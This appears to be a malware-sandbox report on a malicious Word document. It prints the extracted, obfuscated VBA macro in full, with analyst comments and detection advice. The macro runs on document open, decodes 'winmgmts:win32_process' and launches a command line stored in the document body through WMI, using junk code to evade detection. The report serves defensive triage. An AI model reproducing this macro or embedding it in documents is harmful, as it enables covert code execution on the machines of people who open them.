MALICIOUS
112
Risk Score
Heuristics 6
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set J7wd5blh95l = CreateObject(B3q2xk9ql0qmdj) -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_open() -
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
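Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard Office Open XML DrawingML namespace identifier that Office writes into documents; it is not a network indicator for this sample.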
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14993 bytes |
SHA-256: 6045f5f72d49d60894b3d01b2731b9077c6720a2a0e4c882459553248494ff30 |
|||
|
Detection
ClamAV:
No threats found (signature scan only; a clean result here does not override the macro heuristics above)
Obfuscation or payload:
likely
79 of 138 identifiers look randomly generated (e.g. 'Vfvkxexd8sgvdt2dij'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview script — first 1,000 lines of the extracted script
' Analyst note: header of the document's own class module. VB_Base
' "1Normal.ThisDocument" marks it as the ThisDocument object; the module has
' been renamed to the random-looking identifier Qqt8k4mcqpc, which the rest of
' the listing uses to reach the document (Qqt8k4mcqpc.Content, .Paragraphs).
Attribute VB_Name = "Qqt8k4mcqpc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point (the line matched by OLE_VBA_DOCOPEN). Word
' invokes Document_Open when the document is opened with macros enabled, so no
' further user action is needed once macros are allowed.
Private Sub Document_open()
' The only statement: hand control to Txu25y5_tpvil6, defined in another module.
Txu25y5_tpvil6
End Sub
Attribute VB_Name = "Qfykexmzryo"
Attribute VB_Name = "N7c1ep6ej4ord9"
' Analyst note: main routine, called from Document_open.
' What the visible code does, in execution order:
'   1. reads the document body (Qqt8k4mcqpc.Content) into skuwd;
'   2. assembles a string from fragments padded with the filler "[ an ] +";
'   3. strips the filler via Pbcsnpi_dai8_ and passes the result to CreateObject;
'   4. strips the filler from the document text and passes it to .Create.
' Every real statement is followed by "GoTo <label>", and the Dim/For Each
' block between that GoTo and its label is never executed: it is filler that
' inflates the listing and hides the handful of live lines.
Function Txu25y5_tpvil6()
' Suppresses all runtime errors, so a failed step does not raise a dialog.
On Error Resume Next
' Mbl2euom0yp and W0t03ukhytmwm0 are not assigned anywhere in the visible
' listing (presumably Empty), so skuwd is effectively the document's text.
skuwd = Mbl2euom0yp + Qqt8k4mcqpc.Content + W0t03ukhytmwm0
GoTo oOxMG
' Junk block, skipped by the GoTo above. Note the tell-tale signs that it was
' never meant to run: the counter is overwritten with 0 right after being
' computed, and both conditions compare a variable with itself.
Dim NcfzEKI, HtkZfD, DsPwiK As Long
Dim CrGclXLFy As Word.Paragraph
Dim GRElAE() As Byte
For Each CrGclXLFy In Qqt8k4mcqpc.Paragraphs
GRElAE = CrGclXLFy.Range
SSSS = "> Paragraph= " & CrGclXLFy.Range
HtkZfD = UBound(GRElAE) - 1
NcfzEKI = 0
HtkZfD = 0
Do Until HtkZfD > HtkZfD
If GRElAE(HtkZfD) = 46 Or HtkZfD = HtkZfD Then
SSSS = "-> Sen from" & (NcfzEKI / 2) + 1 & " to " & (HtkZfD / 2) + 1 & MidB$(GRElAE, NcfzEKI + 1, HtkZfD - NcfzEKI + 3)
NcfzEKI = HtkZfD + 2
End If
HtkZfD = HtkZfD + 2
Loop
Next
oOxMG:
' Fragment: "p" once the "[ an ] +" filler is removed.
Knit6G = "[ an ] +p[ an ] +"
' Fragment: "rocess" once the filler is removed.
Pd1ssql_07x8c7o_ = "[ an ] +ro[ an ] +[ an ] +ce[ an ] +s[ an ] +s[ an ] +[ an ] +"
GoTo fiRMPlBs
' Junk block, skipped by the GoTo above.
Dim latFAEIDJ, kJxQvBGtm, xXRLyIpB As Long
Dim AQIwpoviI As Word.Paragraph
Dim kLZzHn() As Byte
For Each AQIwpoviI In Qqt8k4mcqpc.Paragraphs
kLZzHn = AQIwpoviI.Range
SSSS = "> Paragraph= " & AQIwpoviI.Range
kJxQvBGtm = UBound(kLZzHn) - 1
latFAEIDJ = 0
kJxQvBGtm = 0
Do Until kJxQvBGtm > kJxQvBGtm
If kLZzHn(kJxQvBGtm) = 46 Or kJxQvBGtm = kJxQvBGtm Then
SSSS = "-> Sen from" & (latFAEIDJ / 2) + 1 & " to " & (kJxQvBGtm / 2) + 1 & MidB$(kLZzHn, latFAEIDJ + 1, kJxQvBGtm - latFAEIDJ + 3)
latFAEIDJ = kJxQvBGtm + 2
End If
kJxQvBGtm = kJxQvBGtm + 2
Loop
Next
fiRMPlBs:
' Fragment: ":win32_" once the filler is removed.
S3p7szivif7c5ws = "[ an ] +:w[ an ] +[ an ] +in[ an ] +3[ an ] +2[ an ] +_[ an ] +"
GoTo FrHeChHHf
' Junk block, skipped by the GoTo above.
Dim gOKDrDGG, ksueJ, FICaGE As Long
Dim eiOxA As Word.Paragraph
Dim gZEHE() As Byte
For Each eiOxA In Qqt8k4mcqpc.Paragraphs
gZEHE = eiOxA.Range
SSSS = "> Paragraph= " & eiOxA.Range
ksueJ = UBound(gZEHE) - 1
gOKDrDGG = 0
ksueJ = 0
Do Until ksueJ > ksueJ
If gZEHE(ksueJ) = 46 Or ksueJ = ksueJ Then
SSSS = "-> Sen from" & (gOKDrDGG / 2) + 1 & " to " & (ksueJ / 2) + 1 & MidB$(gZEHE, gOKDrDGG + 1, ksueJ - gOKDrDGG + 3)
gOKDrDGG = ksueJ + 2
End If
ksueJ = ksueJ + 2
Loop
Next
FrHeChHHf:
' Fragment: "winmgmt" once the filler is removed.
Vd4g0mdp5nrs05au = "w[ an ] +in[ an ] +m[ an ] +gm[ an ] +t[ an ] +[ an ] +"
GoTo HbYdy
' Junk block, skipped by the GoTo above.
Dim TqDXGhG, nhXIcHEBR, xtONNJI As Long
Dim EaltAIqHM As Word.Paragraph
Dim InvXBC() As Byte
For Each EaltAIqHM In Qqt8k4mcqpc.Paragraphs
InvXBC = EaltAIqHM.Range
SSSS = "> Paragraph= " & EaltAIqHM.Range
nhXIcHEBR = UBound(InvXBC) - 1
TqDXGhG = 0
nhXIcHEBR = 0
Do Until nhXIcHEBR > nhXIcHEBR
If InvXBC(nhXIcHEBR) = 46 Or nhXIcHEBR = nhXIcHEBR Then
SSSS = "-> Sen from" & (TqDXGhG / 2) + 1 & " to " & (nhXIcHEBR / 2) + 1 & MidB$(InvXBC, TqDXGhG + 1, nhXIcHEBR - TqDXGhG + 3)
TqDXGhG = nhXIcHEBR + 2
End If
nhXIcHEBR = nhXIcHEBR + 2
Loop
Next
HbYdy:
' Takes one character from the host application's name instead of writing it
' as a literal: Mid(Application.Name, 6, 1). Assuming Application.Name is
' "Microsoft Word", that character is "s". Static string matching on the
' assembled name therefore fails; it only exists at run time.
Sarnbqwh6pb_5pt = "[ an ] +[ an ] +" + Mid(Application.Name, 3 + 3, 1 / 1) + "[ an ] +[ an ] +"
GoTo fsjEyDOzB
' Junk block, skipped by the GoTo above.
Dim TkppEJk, ciZXChNv, iTObGHAH As Long
Dim aTxjXEBZQ As Word.Paragraph
Dim sZYCIF() As Byte
For Each aTxjXEBZQ In Qqt8k4mcqpc.Paragraphs
sZYCIF = aTxjXEBZQ.Range
SSSS = "> Paragraph= " & aTxjXEBZQ.Range
ciZXChNv = UBound(sZYCIF) - 1
TkppEJk = 0
ciZXChNv = 0
Do Until ciZXChNv > ciZXChNv
If sZYCIF(ciZXChNv) = 46 Or ciZXChNv = ciZXChNv Then
SSSS = "-> Sen from" & (TkppEJk / 2) + 1 & " to " & (ciZXChNv / 2) + 1 & MidB$(sZYCIF, TkppEJk + 1, ciZXChNv - TkppEJk + 3)
TkppEJk = ciZXChNv + 2
End If
ciZXChNv = ciZXChNv + 2
Loop
Next
fsjEyDOzB:
' Joins the fragments in the order winmgmt + s + :win32_ + p + rocess, still
' interleaved with filler at this point.
E787xu5p17cj3j = Vd4g0mdp5nrs05au + Sarnbqwh6pb_5pt + S3p7szivif7c5ws + Knit6G + Pd1ssql_07x8c7o_
GoTo FrHuJ
' Junk block, skipped by the GoTo above.
Dim yYsMCB, ISBPrJAvz, FOmZIA As Long
Dim KqiZp As Word.Paragraph
Dim wwzcHJLFE() As Byte
For Each KqiZp In Qqt8k4mcqpc.Paragraphs
wwzcHJLFE = KqiZp.Range
SSSS = "> Paragraph= " & KqiZp.Range
ISBPrJAvz = UBound(wwzcHJLFE) - 1
yYsMCB = 0
ISBPrJAvz = 0
Do Until ISBPrJAvz > ISBPrJAvz
If wwzcHJLFE(ISBPrJAvz) = 46 Or ISBPrJAvz = ISBPrJAvz Then
SSSS = "-> Sen from" & (yYsMCB / 2) + 1 & " to " & (ISBPrJAvz / 2) + 1 & MidB$(wwzcHJLFE, yYsMCB + 1, ISBPrJAvz - yYsMCB + 3)
yYsMCB = ISBPrJAvz + 2
End If
ISBPrJAvz = ISBPrJAvz + 2
Loop
Next
FrHuJ:
' Filler removed by Pbcsnpi_dai8_; with the assumption above the result is
' "winmgmts:win32_process", i.e. the WMI Win32_Process class.
B3q2xk9ql0qmdj = Pbcsnpi_dai8_(E787xu5p17cj3j)
GoTo rrsWsJFDP
' Junk block, skipped by the GoTo above.
Dim BTwtI, mMHPFImJ, mKLXx As Long
Dim HEGEAmDBJ As Word.Paragraph
Dim rNgMSDGn() As Byte
For Each HEGEAmDBJ In Qqt8k4mcqpc.Paragraphs
rNgMSDGn = HEGEAmDBJ.Range
SSSS = "> Paragraph= " & HEGEAmDBJ.Range
mMHPFImJ = UBound(rNgMSDGn) - 1
BTwtI = 0
mMHPFImJ = 0
Do Until mMHPFImJ > mMHPFImJ
If rNgMSDGn(mMHPFImJ) = 46 Or mMHPFImJ = mMHPFImJ Then
SSSS = "-> Sen from" & (BTwtI / 2) + 1 & " to " & (mMHPFImJ / 2) + 1 & MidB$(rNgMSDGn, BTwtI + 1, mMHPFImJ - BTwtI + 3)
BTwtI = mMHPFImJ + 2
End If
mMHPFImJ = mMHPFImJ + 2
Loop
Next
rrsWsJFDP:
' The line matched by OLE_VBA_CREATEOBJ. The object name is a variable, so the
' heuristic sees the call but not which object is requested.
Set J7wd5blh95l = CreateObject(B3q2xk9ql0qmdj)
GoTo GntzJuJ
' Junk block, skipped by the GoTo above.
Dim qugQHJBA, YrTgC, VyVCZ As Long
Dim VmDxzhcC As Word.Paragraph
Dim SXrcRoBG() As Byte
For Each VmDxzhcC In Qqt8k4mcqpc.Paragraphs
SXrcRoBG = VmDxzhcC.Range
SSSS = "> Paragraph= " & VmDxzhcC.Range
YrTgC = UBound(SXrcRoBG) - 1
qugQHJBA = 0
YrTgC = 0
Do Until YrTgC > YrTgC
If SXrcRoBG(YrTgC) = 46 Or YrTgC = YrTgC Then
SSSS = "-> Sen from" & (qugQHJBA / 2) + 1 & " to " & (YrTgC / 2) + 1 & MidB$(SXrcRoBG, qugQHJBA + 1, YrTgC - qugQHJBA + 3)
qugQHJBA = YrTgC + 2
End If
YrTgC = YrTgC + 2
Loop
Next
GntzJuJ:
' Drops the first three characters of the document text and strips the
' filler. The resulting string is stored in the document body, not in the
' macro, and is not shown in this listing.
AAA = Pbcsnpi_dai8_(Mid(skuwd, (4), Len(skuwd)))
' Calls Create with AAA as first argument; the other two arguments are not
' assigned in the visible listing. If the object is Win32_Process as decoded
' above, this starts a process with AAA as its command line.
' Detection note: a process created through WMI is normally parented by the
' WMI provider host (WmiPrvSE.exe) rather than WINWORD.EXE, so rules that only
' watch Office child processes will not see it; correlate with WMI process
' creation telemetry instead.
J7wd5blh95l.Create AAA, Vb7dyjnzwf_gvx9, Z4012y6z59gcy
GoTo FGipeDFy
' Junk block, skipped by the GoTo above.
Dim skJLAACGB, gYqBFv, vYPeSBIE As Long
Dim zILRIJN As Word.Paragraph
Dim bVAfI() As Byte
For Each zILRIJN In Qqt8k4mcqpc.Paragraphs
bVAfI = zILRIJN.Range
SSSS = "> Paragraph= " & zILRIJN.Range
gYqBFv = UBound(bVAfI) - 1
skJLAACGB = 0
gYqBFv = 0
Do Until gYqBFv > gYqBFv
If bVAfI(gYqBFv) = 46 Or gYqBFv = gYqBFv Then
SSSS = "-> Sen from" & (skJLAACGB / 2) + 1 & " to " & (gYqBFv / 2) + 1 & MidB$(bVAfI, skJLAACGB + 1, gYqBFv - skJLAACGB + 3)
skJLAACGB = gYqBFv + 2
End If
gYqBFv = gYqBFv + 2
Loop
Next
FGipeDFy:
End Function
' Analyst note: pass-through wrapper around J63l871e3w869hsxz. It copies its
' argument, hands the copy to J63l871e3w869hsxz and returns that result; the
' extra call layer adds nothing but indirection. As elsewhere in the listing,
' each live statement is followed by a GoTo that skips a block of filler code.
Function Pbcsnpi_dai8_(Vfvkxexd8sgvdt2dij)
' Suppresses all runtime errors inside this wrapper.
On Error Resume Next
GoTo GQZuGIFG
' Junk block, skipped by the GoTo above: the counter is reset to 0 right after
' being computed and both conditions compare a variable with itself.
Dim gounDRHJu, INKgjN, lBHSmI As Long
Dim PVGeBWDo As Word.Paragraph
Dim PUxpD() As Byte
For Each PVGeBWDo In Qqt8k4mcqpc.Paragraphs
PUxpD = PVGeBWDo.Range
SSSS = "> Paragraph= " & PVGeBWDo.Range
INKgjN = UBound(PUxpD) - 1
gounDRHJu = 0
INKgjN = 0
Do Until INKgjN > INKgjN
If PUxpD(INKgjN) = 46 Or INKgjN = INKgjN Then
SSSS = "-> Sen from" & (gounDRHJu / 2) + 1 & " to " & (INKgjN / 2) + 1 & MidB$(PUxpD, gounDRHJu + 1, INKgjN - gounDRHJu + 3)
gounDRHJu = INKgjN + 2
End If
INKgjN = INKgjN + 2
Loop
Next
GQZuGIFG:
' Live statement 1: copy the input string.
V2gghqt2v6atjz7k0 = Vfvkxexd8sgvdt2dij
GoTo GXBrYFHG
' Junk block, skipped by the GoTo above.
Dim KuSGEm, jsJwIkau, PpsMDDBE As Long
Dim vIrpqGTXP As Word.Paragraph
Dim jpZLH() As Byte
For Each vIrpqGTXP In Qqt8k4mcqpc.Paragraphs
jpZLH = vIrpqGTXP.Range
SSSS = "> Paragraph= " & vIrpqGTXP.Range
jsJwIkau = UBound(jpZLH) - 1
KuSGEm = 0
jsJwIkau = 0
Do Until jsJwIkau > jsJwIkau
If jpZLH(jsJwIkau) = 46 Or jsJwIkau = jsJwIkau Then
SSSS = "-> Sen from" & (KuSGEm / 2) + 1 & " to " & (jsJwIkau / 2) + 1 & MidB$(jpZLH, KuSGEm + 1, jsJwIkau - KuSGEm + 3)
KuSGEm = jsJwIkau + 2
End If
jsJwIkau = jsJwIkau + 2
Loop
Next
GXBrYFHG:
' Live statement 2: run the copy through J63l871e3w869hsxz, which replaces
' the "[ an ] +" filler.
T58qvenzbwg_se0 = J63l871e3w869hsxz(V2gghqt2v6atjz7k0)
GoTo tUndJqExg
' Junk block, skipped by the GoTo above.
Dim PSJcMO, iHYKzGFvl, BecdG As Long
Dim iygQeH As Word.Paragraph
Dim CVYSFFs() As Byte
For Each iygQeH In Qqt8k4mcqpc.Paragraphs
CVYSFFs = iygQeH.Range
SSSS = "> Paragraph= " & iygQeH.Range
iHYKzGFvl = UBound(CVYSFFs) - 1
PSJcMO = 0
iHYKzGFvl = 0
Do Until iHYKzGFvl > iHYKzGFvl
If CVYSFFs(iHYKzGFvl) = 46 Or iHYKzGFvl = iHYKzGFvl Then
SSSS = "-> Sen from" & (PSJcMO / 2) + 1 & " to " & (iHYKzGFvl / 2) + 1 & MidB$(CVYSFFs, PSJcMO + 1, iHYKzGFvl - PSJcMO + 3)
PSJcMO = iHYKzGFvl + 2
End If
iHYKzGFvl = iHYKzGFvl + 2
Loop
Next
tUndJqExg:
' Live statement 3: assign the function's return value.
Pbcsnpi_dai8_ = T58qvenzbwg_se0
GoTo wHHRIJ
' Junk block, skipped by the GoTo above.
Dim NIzpbk, vvWBOJ, wwHjTj As Long
Dim ORRsNAwGA As Word.Paragraph
Dim bJcRGDG() As Byte
For Each ORRsNAwGA In Qqt8k4mcqpc.Paragraphs
bJcRGDG = ORRsNAwGA.Range
SSSS = "> Paragraph= " & ORRsNAwGA.Range
vvWBOJ = UBound(bJcRGDG) - 1
NIzpbk = 0
vvWBOJ = 0
Do Until vvWBOJ > vvWBOJ
If bJcRGDG(vvWBOJ) = 46 Or vvWBOJ = vvWBOJ Then
SSSS = "-> Sen from" & (NIzpbk / 2) + 1 & " to " & (vvWBOJ / 2) + 1 & MidB$(bJcRGDG, NIzpbk + 1, vvWBOJ - NIzpbk + 3)
NIzpbk = vvWBOJ + 2
End If
vvWBOJ = vvWBOJ + 2
Loop
Next
wHHRIJ:
End Function
' Analyst note: the string de-obfuscator. Out of the whole body only one
' statement does any work: the Replace call that removes the "[ an ] +" filler
' from its argument. Everything else is a chain of GoTo jumps over filler
' blocks that are never executed.
' Triage hint: the literal filler "[ an ] +" appears in every obfuscated
' string in this listing, so it is a convenient static marker for this sample.
Function J63l871e3w869hsxz(Pik551mjeopll6ygsu)
GoTo uEgnMBHI
' Junk block, skipped by the GoTo above: the counter is reset to 0 right after
' being computed and both conditions compare a variable with itself.
Dim LuaYFdEC, KZaoGWIIb, ztTtA As Long
Dim JKPggJ As Word.Paragraph
Dim MhDjvD() As Byte
For Each JKPggJ In Qqt8k4mcqpc.Paragraphs
MhDjvD = JKPggJ.Range
SSSS = "> Paragraph= " & JKPggJ.Range
KZaoGWIIb = UBound(MhDjvD) - 1
LuaYFdEC = 0
KZaoGWIIb = 0
Do Until KZaoGWIIb > KZaoGWIIb
If MhDjvD(KZaoGWIIb) = 46 Or KZaoGWIIb = KZaoGWIIb Then
SSSS = "-> Sen from" & (LuaYFdEC / 2) + 1 & " to " & (KZaoGWIIb / 2) + 1 & MidB$(MhDjvD, LuaYFdEC + 1, KZaoGWIIb - LuaYFdEC + 3)
LuaYFdEC = KZaoGWIIb + 2
End If
KZaoGWIIb = KZaoGWIIb + 2
Loop
Next
uEgnMBHI:
GoTo xvnRG
' Junk block, skipped by the GoTo above.
Dim roJyHe, MGpZDID, XefVC As Long
Dim FLzhG As Word.Paragraph
Dim HXpqMD() As Byte
For Each FLzhG In Qqt8k4mcqpc.Paragraphs
HXpqMD = FLzhG.Range
SSSS = "> Paragraph= " & FLzhG.Range
MGpZDID = UBound(HXpqMD) - 1
roJyHe = 0
MGpZDID = 0
Do Until MGpZDID > MGpZDID
If HXpqMD(MGpZDID) = 46 Or MGpZDID = MGpZDID Then
SSSS = "-> Sen from" & (roJyHe / 2) + 1 & " to " & (MGpZDID / 2) + 1 & MidB$(HXpqMD, roJyHe + 1, MGpZDID - roJyHe + 3)
roJyHe = MGpZDID + 2
End If
MGpZDID = MGpZDID + 2
Loop
Next
xvnRG:
GoTo ftisABB
' Junk block, skipped by the GoTo above.
Dim HizBBGIP, vbIWHHuGU, JNuPMJGCH As Long
Dim XlaiPH As Word.Paragraph
Dim fNMDJEuR() As Byte
For Each XlaiPH In Qqt8k4mcqpc.Paragraphs
fNMDJEuR = XlaiPH.Range
SSSS = "> Paragraph= " & XlaiPH.Range
vbIWHHuGU = UBound(fNMDJEuR) - 1
HizBBGIP = 0
vbIWHHuGU = 0
Do Until vbIWHHuGU > vbIWHHuGU
If fNMDJEuR(vbIWHHuGU) = 46 Or vbIWHHuGU = vbIWHHuGU Then
SSSS = "-> Sen from" & (HizBBGIP / 2) + 1 & " to " & (vbIWHHuGU / 2) + 1 & MidB$(fNMDJEuR, HizBBGIP + 1, vbIWHHuGU - HizBBGIP + 3)
HizBBGIP = vbIWHHuGU + 2
End If
vbIWHHuGU = vbIWHHuGU + 2
Loop
Next
ftisABB:
' The only live statement: replace every "[ an ] +" in the input and return
' the result. Zfhumym1iok5ehfu7s is not assigned anywhere in the visible
' listing, so it is presumably Empty and the filler is simply deleted.
J63l871e3w869hsxz = Replace(Pik551mjeopll6ygsu, "[ an ] +", Zfhumym1iok5ehfu7s)
GoTo WJONLa
' Junk block, skipped by the GoTo above.
Dim dVGbQGCJF, EJejyIFp, rEkrbFHCG As Long
Dim vwdtzICI As Word.Paragraph
Dim fBQfHGGCC() As Byte
For Each vwdtzICI In Qqt8k4mcqpc.Paragraphs
fBQfHGGCC = vwdtzICI.Range
SSSS = "> Paragraph= " & vwdtzICI.Range
EJejyIFp = UBound(fBQfHGGCC) - 1
dVGbQGCJF = 0
EJejyIFp = 0
Do Until EJejyIFp > EJejyIFp
If fBQfHGGCC(EJejyIFp) = 46 Or EJejyIFp = EJejyIFp Then
SSSS = "-> Sen from" & (dVGbQGCJF / 2) + 1 & " to " & (EJejyIFp / 2) + 1 & MidB$(fBQfHGGCC, dVGbQGCJF + 1, EJejyIFp - dVGbQGCJF + 3)
dVGbQGCJF = EJejyIFp + 2
End If
EJejyIFp = EJejyIFp + 2
Loop
Next
WJONLa:
GoTo FvhhDQ
' Junk block, skipped by the GoTo above.
Dim XBGnI, JAbrIDcH, HAEZE As Long
Dim uauQBMDh As Word.Paragraph
Dim EeaudItbF() As Byte
For Each uauQBMDh In Qqt8k4mcqpc.Paragraphs
EeaudItbF = uauQBMDh.Range
SSSS = "> Paragraph= " & uauQBMDh.Range
JAbrIDcH = UBound(EeaudItbF) - 1
XBGnI = 0
JAbrIDcH = 0
Do Until JAbrIDcH > JAbrIDcH
If EeaudItbF(JAbrIDcH) = 46 Or JAbrIDcH = JAbrIDcH Then
SSSS = "-> Sen from" & (XBGnI / 2) + 1 & " to " & (JAbrIDcH / 2) + 1 & MidB$(EeaudItbF, XBGnI + 1, JAbrIDcH - XBGnI + 3)
XBGnI = JAbrIDcH + 2
End If
JAbrIDcH = JAbrIDcH + 2
Loop
Next
FvhhDQ:
GoTo yCerHAl
' Junk block, skipped by the GoTo above.
Dim rPaVO, UyDdwU, yMxmaLh As Long
Dim VNMKBl As Word.Paragraph
Dim SEXUCDACZ() As Byte
For Each VNMKBl In Qqt8k4mcqpc.Paragraphs
SEXUCDACZ = VNMKBl.Range
SSSS = "> Paragraph= " & VNMKBl.Range
UyDdwU = UBound(SEXUCDACZ) - 1
rPaVO = 0
UyDdwU = 0
Do Until UyDdwU > UyDdwU
If SEXUCDACZ(UyDdwU) = 46 Or UyDdwU = UyDdwU Then
SSSS = "-> Sen from" & (rPaVO / 2) + 1 & " to " & (UyDdwU / 2) + 1 & MidB$(SEXUCDACZ, rPaVO + 1, UyDdwU - rPaVO + 3)
rPaVO = UyDdwU + 2
End If
UyDdwU = UyDdwU + 2
Loop
Next
yCerHAl:
End Function
|
|||